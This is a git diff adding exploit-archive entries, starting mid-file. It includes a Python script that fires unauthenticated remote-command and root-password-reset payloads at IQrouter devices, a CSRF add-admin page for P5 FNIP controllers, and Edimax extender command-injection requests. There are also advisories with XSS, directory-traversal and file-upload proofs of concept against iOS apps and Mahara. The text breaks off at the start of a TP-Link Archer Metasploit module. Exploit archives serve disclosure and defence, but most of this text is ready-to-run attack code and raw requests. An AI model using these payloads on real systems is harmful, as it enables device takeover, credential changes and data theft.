"/cgi-bin/luci/er/vlanTag?restart_network=1", + "Restart network (/vlanTag restart_network param)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/start", + "Start iperf script (/diag_iperf_cmd/start)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/stop", + "Stop iperf script (/diag_iperf_cmd/stop)" + ], + [ + "/cgi-bin/luci/er/get_syslog", + "Router setup info log (/get_syslog)" + ], + [ + "/cgi-bin/luci/er/diag_set_password/c00lpasswd/", + "Change root password to c00lpasswd (can change in code)" + ], + [ + "/cgi-bin/luci/er/reset_password/", + "Change root password to 'changeme' (static)" + ] +] + + +def print_payloads(): + print('#' * 30) + print("Payloads list") + num = 1 + print('######################### RCE without auth ########################') + for payload in rce_any: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '############### RCE (router need to be in setup mode) ###############') + for payload in rce_setup: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '######################### Advanced payloads #########################') + for payload in advanced_payloads: + print("{} - {}".format(num, payload[1])) + num += 1 + + +parser = argparse.ArgumentParser(description="IQrouter multiple RCE") +parser.add_argument('--host', help='Host', type=str) +parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int) +parser.add_argument('-n', '--num', help='Payload number', + default=0, type=int) +parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', + default="pwd", type=str) +parser.add_argument('--protocol', help='Protocol (http/https)', + default="http", type=str) + +args = parser.parse_args() + + +def main(): + print("") + full_payload_list = rce_setup + rce_any + advanced_payloads + payloads_amount = len(full_payload_list) + try: + hostname = args.host + port = args.port + payload_num = int(args.num) + bash_cmd = args.cmd + protocol = args.protocol + + if payload_num < 1 or payload_num > payloads_amount: + print("Error with payload number!") + raise IndexError + if port < 0 or port > 65535: + print("Error with port number") + raise IndexError + if protocol not in ['http', 'https']: + print("Error with protocol name") + raise IndexError + + current_payload = full_payload_list[payload_num - 1] + print("Payload: {}".format(current_payload[1])) + print("Host: {}".format(hostname)) + print("Port: {}".format(port)) + print("Protocol: {}".format(protocol)) + print("Command: {}".format(bash_cmd)) + + full_url = "{}://{}:{}{}".format(protocol, hostname, port, + current_payload[0].format(bash_cmd)) + print("Built URL: {}".format(full_url)) + + r = requests.get(full_url) + print("Status code: {}".format(r.status_code)) + return + except IndexError: + parser.print_help() + print_payloads() + exit(1) + + +if __name__ == '__main__': + print( + "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.") + exit(main()) \ No newline at end of file diff --git a/exploits/hardware/webapps/48362.txt b/exploits/hardware/webapps/48362.txt new file mode 100644 index 000000000..671415866 --- /dev/null +++ b/exploits/hardware/webapps/48362.txt @@ -0,0 +1,90 @@ +# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) +# Google Dork:jizhicms +# Date: 2020-04-18 +# Exploit Author: iej1ctk1g +# Product web page: https://www.p5.hu +# Affected version: 1.0.20, 1.0.11 +# CVE : N/A + + + + + + + +
+ + + + + + + +
+ + + + + + +
+ + + + +
+ + + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/48365.txt b/exploits/hardware/webapps/48365.txt new file mode 100644 index 000000000..c8a33a664 --- /dev/null +++ b/exploits/hardware/webapps/48365.txt @@ -0,0 +1,94 @@ +# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password) +# Date: 2020-04-21 +# Exploit Author: Besim ALTINOK +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Version:1.13 +# Tested on: Edimax EW-7438RPn 1.13 Version + +----------------------------- +Here step by step : + + 1. I did Setup + 2. After setup try to access to *wlencrypt_wiz.asp* file + 3. After access to this file, I saw some information disclosure +(Like *WiFi Password*) + 4. Here is the all leak here: + +------------------------------- + + +
+ + + + + + + + +
+ + + +-- + +Besim ALTINOK + +*Security Engineer* \ No newline at end of file diff --git a/exploits/hardware/webapps/48377.txt b/exploits/hardware/webapps/48377.txt new file mode 100644 index 000000000..6d6bf69e5 --- /dev/null +++ b/exploits/hardware/webapps/48377.txt @@ -0,0 +1,75 @@ +# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution +# Date: 2020-04-23 +# Exploit Author: Besim ALTINOK +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Version:1.13 +# Tested on: Edimax EW-7438RPn 1.13 Version + +------ + +NOTE: This device configurated with root permissions. So you can run the +command as root + +Here is the detail(s) of the RCE(s) + +1- Content of the mp.asp file + +
+   +   +   +
+ +RCE Detail: +------------------------------- + +POST /goform/mp HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 25 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +command=||busybox+ls&getID= + +------------------------------- + +2- Content of the syscmd.asp + +
+ +This page can be used to run target system command. +
+ + + + + +RCE Detail: +------------------------------- + +POST /goform/formSysCmd HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 11 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +sysCmd="command to here" \ No newline at end of file diff --git a/exploits/ios/webapps/48321.txt b/exploits/ios/webapps/48321.txt new file mode 100644 index 000000000..833bae26a --- /dev/null +++ b/exploits/ios/webapps/48321.txt @@ -0,0 +1,417 @@ +# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: http://www.app2pro.com +# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 +# CVE: N/A + +Document Title: +=============== +AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2203 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2203 + + +Common Vulnerability Scoring System: +==================================== +4.5 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +File sharing with other iOS devices via Bluetooth or Wi-Fi connection +with automatic search of nearest devices. +Users can perform file operations on the application like: Copy, Move, +Zip, Unzip, Rename, Delete, Email, and more. +Easy to create file like: Text File, New folder, Playlist, Take +Photo/Video, Import From Library, and Voice Record. +AirDisk Pro allows you to store, view and manage files on your iPhone, +iPad or iPod touch. You can connect to AirDisk +Pro from any Mac or PC over the Wi-Fi network and transfer files by drag +& drop files straight from the Finder or Windows +Explorer. AirDisk Pro features document viewer, PDF reader, music +player, image viewer, voice recorder, text editor, file +manager and support most of the file operations: like delete, move, +copy, email, share, zip, unzip and more. + +(Copy of the Homepage: +https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 ) +(Copy of the Homepage: http://www.app2pro.com ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile +application. + + +Affected Product(s): +==================== +Felix Yew +Product: AirDisk Pro v5.5.3 (iOS) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +No authentication (guest) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site scripting vulnerability has been +discovered in the official SuperBackup v2.0.5 ios mobile application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise the mobile +web-application from the application-side. + +The first vulnerability is located in the `createFolder` parameter of +the `Create Folder` function. Attackers are able to name +or rename paths via airdisk pro ui to malicious persistent script codes. +Thus allows to execute the persistent injected script +code on the front site of the path index listing in the content itself +on each refresh. The request method to inject is POST +and the attack vector is located on the application-side. Interaction to +exploit is as well possible through the unauthenticated +started ftp service on the local network. + +The second vulnerability is located in the `deleteFile` parameter of the +`Delete` function. The output location with the popup +that asks for permission to delete, allows to execute the script code. +The injection point is the file parameter and the execution +point occurs in the visible delete popup with the permission question. +The request method to inject is POST and the attack vector +is located on the application-side. + +The third web vulnerability is located in the `devicename` parameter +that is displayed on the top next to the airdisk pro ui logo. +Remote attackers are able to inject own malicious persistent script code +by manipulation of the local apple devicename information. +The injection point is the devicename information and the execution +point occurs in the file sharing ui panel of the airdisk pro +mobile web-application. + +Remote attackers are able to inject own script codes to the client-side +requested vulnerable web-application parameters. The attack +vector of the vulnerability is persistent and the request method to +inject/execute is POST. The vulnerabilities are classic client-side +cross site scripting vulnerabilities. Successful exploitation of the +vulnerability results in session hijacking, persistent phishing +attacks, persistent external redirects to malicious source and +persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] AirDisk pro Wifi UI + +Vulnerable Parameter(s): +[+] createFolder +[+] deleteFile +[+] devicename + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with wifi access with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +1. Create Folder + +PoC: Vulnerable Source + +
+ + + + + +
System Command:
test11 Apr 2020 at 12:35Folder  + +
+ +test>" + + +PoC: Vulnerable Source (Listing - Index) + +

Contacts 09:17:12:PM 10:Apr.:2020 .vcf

 +

26.40 KB

+		 + +
+ + + +PoC: Exception-Handling +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >" +09:17:12:PM 10:Apr.:2020 .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts 09:17:12:PM 10:Apr.:2020 >" .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >"09:17:12:PM 10:Apr.:2020 .vcf" + + +PoC: Exploit +BEGIN:VCARD +VERSION:3.0 +PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN +B:Kunz Mejri ;>" ;;; +END:VCARD + + +--- PoC Session Logs [POST] --- +http://localhost/move +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 187 +Origin: http://localhost +Connection: keep-alive +Referer: http://localhost/ +oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf&newPath=/evil-filename>".vc +- +POST: HTTP/1.1 500 Internal Server Error +Content-Length: 593 +Content-Type: text/html; charset=utf-8 +Connection: Close +Server: GCDWebUploader +- +http://localhost/evil.source +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://localhost/ +- +GET: HTTP/1.1 200 OK +Server: GCDWebUploader +Connection: Close + + +Solution - Fix & Patch: +======================= +1. Parse and filter the vcf name values next to add, edit or imports to +prevent an execution +2. Restrict and filter in the index listing the vcf names to sanitize +the output + + +Security Risk: +============== +The security risk of the persistent vcf cross site scripting web +vulnerability is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48327.txt b/exploits/ios/webapps/48327.txt new file mode 100644 index 000000000..6063109bf --- /dev/null +++ b/exploits/ios/webapps/48327.txt @@ -0,0 +1,245 @@ +# Title: File Transfer iFamily 2.1 - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: http://www.dedecms.com/products/dedecms/downloads/ +# CVE: N/A + +Document Title: +=============== +File Transfer iFamily v2.1 - Directory Traversal Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2199 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2199 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Vulnerability Class: +==================== +Directory- or Path-Traversal + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Send photos, videos and documents to other devices without Internet. A +complete application to exchange files +wirelessly between devices. It uses the Multipeer Connectivity Framework +to search and connect to available devices, +without the need of internet connection or any kind of server and database. + +(Copy of the Homepage: +https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a directory +traversal web vulnerability in the official File Transfer iFamily v2.1 +ios mobile application. + + +Affected Product(s): +==================== +DONG JOO CHO +Product: File Transfer iFamily v2.1 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been discovered in the +official File Transfer iFamily v2.1 ios mobile application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability is located in the main +application path request performed via GET method. Attackers are +able to request for example the local ./etc/ path of the web-server by +changing the local path in the performed request itself. +In a first request the attack changes the path, the host redirects to +complete the adress with "..". Then the attacker just +attaches a final slash to its request and the path can be accessed via +web-browser to download local files. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. + + +Proof of Concept (PoC): +======================= +The directory traversal vulnerability can be exploited by attackers with +access to the wifi interface in a local network without user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information and steps below to continue. + + +PoC: Exploitation +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +http://localhost//../ + + +--- PoC Session Logs [GET]] --- +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 +- +http://localhost../etc/ +Host: localhost.. +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- add slash to correct host adress (/.././) +http://localhost/./ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- Access granted +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a restriction of the visible and +accessable ./etc/ path in the app container. +Disallow path changes in the client-side get method requests and +validate them securely. + + +Security Risk: +============== +The security risk of the directory travsersal web vulnerability in the +ios mobile application is estimated as high. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ \ No newline at end of file diff --git a/exploits/ios/webapps/48340.txt b/exploits/ios/webapps/48340.txt new file mode 100644 index 000000000..2960d2761 --- /dev/null +++ b/exploits/ios/webapps/48340.txt @@ -0,0 +1,423 @@ +# Title: Playable 9.18 iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034 +# CVE: N/A + +Document Title: +=============== +Playable v9.18 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2198 + + +Release Date: +============= +2020-04-16 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2198 + + +Common Vulnerability Scoring System: +==================================== +7.3 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod +Touch without conversion - +just copy files to your device through iTunes or over Wifi! To search +for closed captions / +subtitles select a video then press the magnifying glass icon to the top +right of the video. + +(Copy of the Homepage: +https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +vulnerabilities in the official Playable v9.18 apple ios mobile application. + + +Affected Product(s): +==================== +Portable Ltd +Product: Playable v9.18 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-16: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 +A persistent script code injection web vulnerability has been discovered +in the official Playable v9.18 apple ios mobile application. +The vulnerability allows remote attackers to inject own malicious +persistent script codes to the application-side for manipulation. + +The vulnerability is located in the filename parameter of the upload +module. Attackers with wifi access are able to perform uploads +with malicious script code to manipulation the mobile application ui. +The request method to inject is POST and the attack vector of +the vulnerability is persistent. Attackers are able to inject html and +javascript codes to comrpomise the mobile wifi web-application. +The injection point is the upload form on localhost:8881 and the +execution occurs on localhost:80 with the visible ui listing. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected mobile +application modules. + +Request Method(s): +[+] POST + +Vulnerable Function(s): +[+] upload + +Vulnerable Parameter(s): +[+] filename + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the +official Playable v9.18 apple ios mobile application. +The arbitary file upload vulnerability allows remote attackers to upload +malicious files to compromise the mobile application. + +The vulnerability is located in the filename parameter of the upload +module. Attackers with wifi access are able to perform +uploads with malicious file extions to bypass the parse function. In a +second step the attacker requests the local file to +execute the malicious content on the local web-server. The request +method to inject is POST and the attack vector of the +vulnerability is located on the application-side. The injection point is +the upload form on localhost:8881. The execution +point becomes visible by a request the localhost:80/vid/[filename] path +with the uploaded file content. The is present +because of a missing file parse and insecure upload handling on file +extensions. As well the local web-server can be +reconfigured to provide more security on user interactions. + +Successful exploitation of the arbitrary file upload vulnerability +results in a compromise of the local ios mobile application. + +Request Method(s): +[+] POST + +Vulnerable Function(s): +[+] upload + +Vulnerable Parameter(s): +[+] filename + +Affected Module(s): +[+] /vid/ + + +Proof of Concept (PoC): +======================= +1.1 +The persistent script code injection vulnerability can be exploited by +remote attackers with wifi network access without user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Install the ios application +(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034) +2. Start the ios application on your local ios device +3. Start the wifi share service in the application ui +4. Open the web-browser +5. Tamper the http requests +6. Prepare to upload any file and press the upload button +7. Inject as filename any html/js script code payload +8. Continue to transmit the POST method request +9. The file executes on the index listing on port 8881 +(http://localhost:8881/index.html) +10. Successful reproduce of the persistent script code injection web +vulnerability! + + +PoC: Exploitation +>" +>" + + + + +Carpeta: +>" +>" + + +>" >" + +20/04/2020 + + +
+... ... + +
+ + +--- PoC Session Logs [POST] --- (Mygroup Ficheros) +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------98107146915324237501974151621 +Content-Length: 4879 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& +files_filebrowser_edit_title=>" >"&files_filebrowser_edit_description=>" +>"&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& +files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& +files_filebrowser_edit_licensor=>" >"&files_filebrowser_edit_licensorurl=>" +>"&files_filebrowser_edit_allowcomments=on& +files_filebrowser_update[7191]=Guardar +cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 +- +POST: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2- +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +- +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------126319663526561351602937008964 +Content-Length: 3721 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& +files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& +sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 +- +GET: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2 + + +Reference(s): +https://mahara_cms.localhost:8080/artefact/ +https://mahara_cms.localhost:8080/artefact/file/ +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/linux_mips/remote/48331.rb b/exploits/linux_mips/remote/48331.rb new file mode 100755 index 000000000..c4a71c239 --- /dev/null +++ b/exploits/linux_mips/remote/48331.rb @@ -0,0 +1,391 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'openssl' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution', + 'Description' => %q{ + This module exploits a command injection vulnerability in the tdpServer daemon 